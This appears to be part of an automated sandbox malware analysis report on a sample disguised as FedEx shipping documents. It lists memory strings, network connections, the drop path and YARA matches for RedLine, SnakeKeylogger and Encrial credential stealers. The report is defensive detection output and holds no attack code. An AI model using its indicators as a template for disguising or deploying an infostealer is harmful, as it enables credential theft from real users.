        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: hzwdvhxM.pif, 00000007.00000002.3928012467.000000002975E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A90E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: hzwdvhxM.pif, 00000007.00000003.3266544740.000000002A9DD000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.3694016126.0000000026F4C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.3663570855.000000002BB8C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: hzwdvhxM.pif, 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49762 version: TLS 1.2
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow created: window name: CLIPBRDWNDCLASS

        System Summary

        barindex
        Source: 12.2.hzwdvhxM.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2189b7a8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.1.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.438038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.1.hzwdvhxM.pif.4da6c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 14.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.1.hzwdvhxM.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 14.1.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 11.2.Mxhvdwzh.PIF.215fa548.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.4da6c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.21686db8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.1.hzwdvhxM.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 11.2.Mxhvdwzh.PIF.2169cbd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.1.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 14.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.1.hzwdvhxM.pif.438038.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.4da6c8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 7.1.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
